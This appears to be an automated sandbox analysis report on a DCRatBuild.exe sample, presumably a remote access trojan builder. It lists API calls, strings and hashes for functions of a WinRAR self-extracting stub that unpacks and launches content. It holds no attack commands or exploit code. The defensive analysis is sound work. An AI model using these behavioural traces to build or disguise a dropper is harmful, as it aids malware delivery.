Source File: 00000001.00000002.2104045733.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b880000_Bootstrapper.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c307949d7118e43dce688efc265c0e3039ee9eb1ef64820866f5481793749ba6
Instruction ID: d6274bb81978dd649b05f8ffcb72767367239fdfb43ea48bbaf4e32969a431c4
Opcode Fuzzy Hash: c307949d7118e43dce688efc265c0e3039ee9eb1ef64820866f5481793749ba6
Instruction Fuzzy Hash: 52C02B32F0400449D700BA78F8114F97330DFC3259F0400B3C628C70B3DD561058C241

Function 00007FFD9B88EC8E Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2104045733.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b880000_Bootstrapper.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a5ec3dd93e87c8aa3914616edaf2ebb683c92c72ed722757b140c1431f563e1
Instruction ID: ee2963564aad4f9421065f138b74079134c63c9e9907da0ba66f8f2b3b527671
Opcode Fuzzy Hash: 4a5ec3dd93e87c8aa3914616edaf2ebb683c92c72ed722757b140c1431f563e1
Instruction Fuzzy Hash: 69A0220282020A00AE0C30320B22CFC2280CA002E8FC800E8AC888E0C3E80C23CE2320

Non-executed Functions

Function 00007FFD9B8885FA Relevance: 5.1, Strings: 4, Instructions: 93COMMON

Download Yara Rule

Strings

N_^#, xrefs: 00007FFD9B8886C2
N_^, xrefs: 00007FFD9B8885FA
N_^, xrefs: 00007FFD9B888622
N_^$, xrefs: 00007FFD9B8886CA

Memory Dump Source

Source File: 00000001.00000002.2104045733.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b880000_Bootstrapper.jbxd

Similarity

API ID:
String ID: N_^$N_^$N_^#$N_^$
API String ID: 0-422789674
Opcode ID: 332997d391172bcfff1d2774cc3e7fc5d5fd59be303764f10775b276c97473f2
Instruction ID: 993514f42a32f857d85f34162acee014c74347158ff63d39a5d73e6fbf636d81
Opcode Fuzzy Hash: 332997d391172bcfff1d2774cc3e7fc5d5fd59be303764f10775b276c97473f2
Instruction Fuzzy Hash: 01318A72F1EA664BE33BA799EC780A4A790AF1532570A05F7C27DD70D3AD24390642C6

Function 00007FFD9B888BFA Relevance: 5.1, Strings: 4, Instructions: 85COMMON

Download Yara Rule

Strings

N_^, xrefs: 00007FFD9B888C6A
N_^, xrefs: 00007FFD9B888C12
N_^, xrefs: 00007FFD9B888C2A
N_^, xrefs: 00007FFD9B888C7A

Memory Dump Source

Source File: 00000001.00000002.2104045733.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b880000_Bootstrapper.jbxd

Similarity

API ID:
String ID: N_^$N_^$N_^$N_^
API String ID: 0-3900292545
Opcode ID: b27532545d908282d8255c52e2330ff8b4754c1dcdbe81f0676956437292755e
Instruction ID: 8a62c1b58f4cd4dd661c5e93efb6b8a63b2147689cd16ed68a11116b7c5857ba
Opcode Fuzzy Hash: b27532545d908282d8255c52e2330ff8b4754c1dcdbe81f0676956437292755e
Instruction Fuzzy Hash: C621D6B3B07A665FD3564BAE8C794953BD0FF1061834F01F6C1A9CB1A3FD2866074242

Function 00007FFD9B888BF8 Relevance: 5.1, Strings: 4, Instructions: 81COMMON

Download Yara Rule

Strings

N_^, xrefs: 00007FFD9B888C6A
N_^, xrefs: 00007FFD9B888C12
N_^, xrefs: 00007FFD9B888C2A
N_^, xrefs: 00007FFD9B888C7A

Memory Dump Source

Source File: 00000001.00000002.2104045733.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b880000_Bootstrapper.jbxd

Similarity

API ID:
String ID: N_^$N_^$N_^$N_^
API String ID: 0-3900292545
Opcode ID: bfc243926310adbfa2d0c62ee1e52e4423c9e33668261fa7f938b5983c1df759
Instruction ID: 6853b696a4841d7f2974c5b9c592851b3015a80c369a4cdeec264bbd964492f7
Opcode Fuzzy Hash: bfc243926310adbfa2d0c62ee1e52e4423c9e33668261fa7f938b5983c1df759
Instruction Fuzzy Hash: 7A21B5B2A0BA665FD3564BAE8C7D4953BD0FF1061830F01F6C1A98B1E3FD2866474642

Analysis Process: DCRatBuild.exePID: 7584, Parent PID: 7492COMMON

Execution Graph

Execution Coverage:	9.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	5.1%
Total number of Nodes:	1468
Total number of Limit Nodes:	46

Executed Functions

Function 00B2DF1E Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 195
filesleeptimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00B20863: GetModuleHandleW.KERNEL32(kernel32), ref: 00B2087C
Part of subcall function 00B20863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00B2088E
Part of subcall function 00B20863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00B208BF

Part of subcall function 00B2A64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00B2A655

Part of subcall function 00B2AC16: OleInitialize.OLE32(00000000), ref: 00B2AC2F
Part of subcall function 00B2AC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00B2AC66
Part of subcall function 00B2AC16: SHGetMalloc.SHELL32(00B58438), ref: 00B2AC70

GetCommandLineW.KERNEL32 ref: 00B2DF5C
OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 00B2DF83
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 00B2DF94
UnmapViewOfFile.KERNEL32(00000000), ref: 00B2DFCE

Part of subcall function 00B2DBDE: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00B2DBF4
Part of subcall function 00B2DBDE: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00B2DC30

CloseHandle.KERNEL32(00000000), ref: 00B2DFD7
GetModuleFileNameW.KERNEL32(00000000,00B6EC90,00000800), ref: 00B2DFF2
SetEnvironmentVariableW.KERNEL32(sfxname,00B6EC90), ref: 00B2DFFE
GetLocalTime.KERNEL32(?), ref: 00B2E009
_swprintf.LIBCMT ref: 00B2E048
SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 00B2E05A
GetModuleHandleW.KERNEL32(00000000), ref: 00B2E061
LoadIconW.USER32(00000000,00000064), ref: 00B2E078
DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 00B2E0C9
Sleep.KERNEL32(?), ref: 00B2E0F7
DeleteObject.GDI32 ref: 00B2E130
DeleteObject.GDI32(?), ref: 00B2E140
CloseHandle.KERNEL32 ref: 00B2E183

Strings

winrarsfxmappingfile.tmp, xrefs: 00B2DF77
sfxname, xrefs: 00B2DFF9
sfxstime, xrefs: 00B2E055
STARTDLG, xrefs: 00B2E0BE
C:\Users\user\Desktop, xrefs: 00B2DF33
%4d-%02d-%02d-%02d-%02d-%02d-%03d, xrefs: 00B2E039

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
API String ID: 3049964643-3743209390
Opcode ID: 5d894da46dbc385db681fa05fa8a815d6b95614ed9d6035ceebc3db1dda7f3b3
Instruction ID: ddc1ce3836d71acf22486d2ca91623a38f4a47b1b2e4dfbafc9a8e8fc33779f3
Opcode Fuzzy Hash: 5d894da46dbc385db681fa05fa8a815d6b95614ed9d6035ceebc3db1dda7f3b3
Instruction Fuzzy Hash: 80610231504365ABD320AB65FC59F6B37ECEB09B01F0804A9F909A32E1DFB8DA44C761

Function 00B2A6C2 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 100
memorywindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00B2B73D,00000066), ref: 00B2A6D5
SizeofResource.KERNEL32(00000000,?,?,?,00B2B73D,00000066), ref: 00B2A6EC
LoadResource.KERNEL32(00000000,?,?,?,00B2B73D,00000066), ref: 00B2A703
LockResource.KERNEL32(00000000,?,?,?,00B2B73D,00000066), ref: 00B2A712
GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00B2B73D,00000066), ref: 00B2A72D
GlobalLock.KERNEL32(00000000), ref: 00B2A73E
CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00B2A762
GlobalUnlock.KERNEL32(00000000), ref: 00B2A7C6

Part of subcall function 00B2A626: GdipAlloc.GDIPLUS(00000010), ref: 00B2A62C

GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00B2A7A7
GlobalFree.KERNEL32(00000000), ref: 00B2A7CD

Strings

PNG, xrefs: 00B2A6C6

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
String ID: PNG
API String ID: 211097158-364855578
Opcode ID: 86bcd54098efc244d1381daeaebae143d7469fab05b170426815e0c0bafa545a
Instruction ID: a76115e2feb12365180561e7ed735341667e05fadcc1b0a9734cf54ea46586f0
Opcode Fuzzy Hash: 86bcd54098efc244d1381daeaebae143d7469fab05b170426815e0c0bafa545a
Instruction Fuzzy Hash: B331A179601712AFD7119F21EC88D1B7BF9FF85B60B080958F909A3270EF31DD409A66

Function 00B1A69B Relevance: 7.6, APIs: 5, Instructions: 105
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00B1A592,000000FF,?,?), ref: 00B1A6C4

Part of subcall function 00B1BB03: _wcslen.LIBCMT ref: 00B1BB27

FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00B1A592,000000FF,?,?), ref: 00B1A6F2
GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00B1A592,000000FF,?,?), ref: 00B1A6FE
FindNextFileW.KERNEL32(?,?,?,?,?,?,00B1A592,000000FF,?,?), ref: 00B1A728
GetLastError.KERNEL32(?,?,?,?,00B1A592,000000FF,?,?), ref: 00B1A734

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: FileFind$ErrorFirstLast$Next_wcslen
String ID:
API String ID: 42610566-0
Opcode ID: 3435a93d750decfdd59f0859bae611257ca151f5fb900e6396dc08ad3a650029
Instruction ID: e9ab6a0c4c828cbdced4824712d22f9bd1c678d46df8116231cb6e69e4b92869
Opcode Fuzzy Hash: 3435a93d750decfdd59f0859bae611257ca151f5fb900e6396dc08ad3a650029
Instruction Fuzzy Hash: 98414976901515ABCB25DF68DC88AEAB7F8FB48350F144296E569E3240DB34AED08F90

Function 00B37DEE Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,?,00B37DC4,00000000,00B4C300,0000000C,00B37F1B,00000000,00000002,00000000), ref: 00B37E0F
TerminateProcess.KERNEL32(00000000,?,00B37DC4,00000000,00B4C300,0000000C,00B37F1B,00000000,00000002,00000000), ref: 00B37E16
ExitProcess.KERNEL32 ref: 00B37E28

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 1e99fe511e499fe6bb5b6b9b35d6ded5e9a3eb36cf105308dfd30f3d21b1b5fc
Instruction ID: 03ac88e865785ac60b1c1757e009fc79b465b103ed85986be157783c77e1f074
Opcode Fuzzy Hash: 1e99fe511e499fe6bb5b6b9b35d6ded5e9a3eb36cf105308dfd30f3d21b1b5fc
Instruction Fuzzy Hash: F0E04639000158ABCF216F20DD0AA4A3FEAFF01741F244494F8098B232CF36DF52CA80

Function 00B1848E Relevance: 2.5, APIs: 1, Instructions: 960COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00B18493

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 104e73ff8712d2eb5335e0a1b8bc999d51ba459b32bc455f56718e9e452f9c66
Instruction ID: 8ff676635309be75a732e5e7722ff536129d8ca42b21f48a842ef38285cf793c
Opcode Fuzzy Hash: 104e73ff8712d2eb5335e0a1b8bc999d51ba459b32bc455f56718e9e452f9c66
Instruction Fuzzy Hash: E182F771904285AEDF15DB64C895BFABBF9FF15300F8841F9E8499B182DB315AC8CB60

Function 00B2B7E0 Relevance: 102.2, APIs: 48, Strings: 10, Instructions: 731windowfilesleepCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00B2B7E5

Part of subcall function 00B11316: GetDlgItem.USER32(00000000,00003021), ref: 00B1135A
Part of subcall function 00B11316: SetWindowTextW.USER32(00000000,00B435F4), ref: 00B11370

SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00B2B8D1
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B2B8EF
IsDialogMessageW.USER32(?,?), ref: 00B2B902
TranslateMessage.USER32(?), ref: 00B2B910
DispatchMessageW.USER32(?), ref: 00B2B91A
GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 00B2B93D
KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 00B2B960
GetDlgItem.USER32(?,00000068), ref: 00B2B983
SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00B2B99E
SendMessageW.USER32(00000000,000000C2,00000000,00B435F4), ref: 00B2B9B1

Part of subcall function 00B2D453: _wcslen.LIBCMT ref: 00B2D47D

SetFocus.USER32(00000000), ref: 00B2B9B8
_swprintf.LIBCMT ref: 00B2BA24

Part of subcall function 00B14092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B140A5

Part of subcall function 00B2D4D4: GetDlgItem.USER32(00000068,00B6FCB8), ref: 00B2D4E8
Part of subcall function 00B2D4D4: ShowWindow.USER32(00000000,00000005,?,?,?,00B2AF07,00000001,?,?,00B2B7B9,00B4506C,00B6FCB8,00B6FCB8,00001000,00000000,00000000), ref: 00B2D510
Part of subcall function 00B2D4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00B2D51B
Part of subcall function 00B2D4D4: SendMessageW.USER32(00000000,000000C2,00000000,00B435F4), ref: 00B2D529
Part of subcall function 00B2D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00B2D53F
Part of subcall function 00B2D4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00B2D559
Part of subcall function 00B2D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00B2D59D
Part of subcall function 00B2D4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00B2D5AB
Part of subcall function 00B2D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00B2D5BA
Part of subcall function 00B2D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00B2D5E1
Part of subcall function 00B2D4D4: SendMessageW.USER32(00000000,000000C2,00000000,00B443F4), ref: 00B2D5F0

GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 00B2BA68
GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 00B2BA90
GetTickCount.KERNEL32 ref: 00B2BAAE
_swprintf.LIBCMT ref: 00B2BAC2
GetLastError.KERNEL32(?,00000011), ref: 00B2BAF4
GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 00B2BB43
_swprintf.LIBCMT ref: 00B2BB7C
CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 00B2BBD0
GetCommandLineW.KERNEL32 ref: 00B2BBEA
MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 00B2BC47
ShellExecuteExW.SHELL32(0000003C), ref: 00B2BC6F
Sleep.KERNEL32(00000064), ref: 00B2BCB9
UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 00B2BCE2
CloseHandle.KERNEL32(00000000), ref: 00B2BCEB
_swprintf.LIBCMT ref: 00B2BD1E
SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00B2BD7D
SetDlgItemTextW.USER32(?,00000065,00B435F4), ref: 00B2BD94
GetDlgItem.USER32(?,00000065), ref: 00B2BD9D
GetWindowLongW.USER32(00000000,000000F0), ref: 00B2BDAC
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00B2BDBB
SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00B2BE68
_wcslen.LIBCMT ref: 00B2BEBE
_swprintf.LIBCMT ref: 00B2BEE8
SendMessageW.USER32(?,00000080,00000001,?), ref: 00B2BF32
SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 00B2BF4C
GetDlgItem.USER32(?,00000068), ref: 00B2BF55
SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 00B2BF6B
GetDlgItem.USER32(?,00000066), ref: 00B2BF85
SetWindowTextW.USER32(00000000,00B5A472), ref: 00B2BFA7
SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 00B2C007
SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00B2C01A
DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 00B2C0BD
EnableWindow.USER32(00000000,00000000), ref: 00B2C197
SendMessageW.USER32(?,00000111,00000001,00000000), ref: 00B2C1D9

Part of subcall function 00B2C73F: __EH_prolog.LIBCMT ref: 00B2C744

SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00B2C1FD

Strings

__tmp_rar_sfx_access_check_%u, xrefs: 00B2BAB5
winrarsfxmappingfile.tmp, xrefs: 00B2BBA6
STARTDLG, xrefs: 00B2B801
%s, xrefs: 00B2BED8
C:\Users\user\Desktop, xrefs: 00B2BBC9
@, xrefs: 00B2BB91
<, xrefs: 00B2BB84
LICENSEDLG, xrefs: 00B2C0B2
-el -s2 "-d%s" "-sp%s", xrefs: 00B2BB6B
"%s"%s, xrefs: 00B2BD0D

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: Message$ItemSend$Text$Window$_swprintf$File$ErrorLast$DialogH_prologLongView_wcslen$CallbackCloseCommandCountCreateDispatchDispatcherEnableExecuteFocusHandleLineMappingModuleNameParamShellShowSleepTickTranslateUnmapUser__vswprintf_c_l
String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
API String ID: 3445078344-2238251102
Opcode ID: 4816b79c30bf2250f64c7f3490fcf1847f905596535a206eb082b4fe9a9a9e11
Instruction ID: 5aa0dde919f9bd24033ead624f40e8b80319be304c743e827fdd0bf3daf6c7f7
Opcode Fuzzy Hash: 4816b79c30bf2250f64c7f3490fcf1847f905596535a206eb082b4fe9a9a9e11
Instruction Fuzzy Hash: C942C671944365BAEB21AB64AC4AFBE3BECEB01701F4401D5F648B71E2CF755A84CB21

Function 00B20863 Relevance: 52.8, APIs: 23, Strings: 7, Instructions: 316
libraryfileloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(kernel32), ref: 00B2087C
GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00B2088E
GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00B208BF
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00B20B69
CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B20B83
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00B20B93
ReadFile.KERNEL32(00000000,?,00007FFE,00B43C7C,00000000), ref: 00B20BB1
CloseHandle.KERNEL32(00000000), ref: 00B20C09
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00B20C1E
CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,00B43C7C,?,00000000,?,00000800), ref: 00B20C72
GetFileAttributesW.KERNELBASE(?,?,00B43C7C,00000800,?,00000000,?,00000800), ref: 00B20C9C
GetFileAttributesW.KERNEL32(?,?,00B43D44,00000800), ref: 00B20CD8

Part of subcall function 00B2081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00B20836
Part of subcall function 00B2081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00B1F2D8,Crypt32.dll,00000000,00B1F35C,?,?,00B1F33E,?,?,?), ref: 00B20858

_swprintf.LIBCMT ref: 00B20D4A
_swprintf.LIBCMT ref: 00B20D96

Part of subcall function 00B14092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B140A5

AllocConsole.KERNEL32 ref: 00B20D9E
GetCurrentProcessId.KERNEL32 ref: 00B20DA8
AttachConsole.KERNEL32(00000000), ref: 00B20DAF
_wcslen.LIBCMT ref: 00B20DC4
GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00B20DD5
WriteConsoleW.KERNEL32(00000000), ref: 00B20DDC
Sleep.KERNEL32(00002710), ref: 00B20DE7
FreeConsole.KERNEL32 ref: 00B20DED
ExitProcess.KERNEL32 ref: 00B20DF5

Strings

kernel32, xrefs: 00B20873
DXGIDebug.dll, xrefs: 00B208FC, 00B20C5E
SetDllDirectoryW, xrefs: 00B20888
Please remove %s from %s folder. It is unsecure to run %s until it is done., xrefs: 00B20D84
uxtheme.dll, xrefs: 00B20D17
dwmapi.dll, xrefs: 00B20927, 00B20D0D
SetDefaultDllDirectories, xrefs: 00B208B9

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
API String ID: 1207345701-3298887752
Opcode ID: fb4141506e35a1f09fac4e5a0e62ce3ac37cd0f5fd79752cfb29673a1b479d41
Instruction ID: 80c79517c222925b0f1ef39d7b8ce59a5379674c3312b951810aec762ea747dc
Opcode Fuzzy Hash: fb4141506e35a1f09fac4e5a0e62ce3ac37cd0f5fd79752cfb29673a1b479d41
Instruction Fuzzy Hash: BDD1A6B2408354ABD730EF50D889B9FBAE8FF85B04F54099DF18997251CBB48748DB62

Function 00B2C73F Relevance: 47.7, APIs: 23, Strings: 4, Instructions: 428
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 00B2C744

Part of subcall function 00B2B314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 00B2B3FB

_wcslen.LIBCMT ref: 00B2CA0A
_wcslen.LIBCMT ref: 00B2CA13
SetWindowTextW.USER32(?,?), ref: 00B2CA71
_wcslen.LIBCMT ref: 00B2CAB3
_wcsrchr.LIBVCRUNTIME ref: 00B2CBFB
GetDlgItem.USER32(?,00000066), ref: 00B2CC36
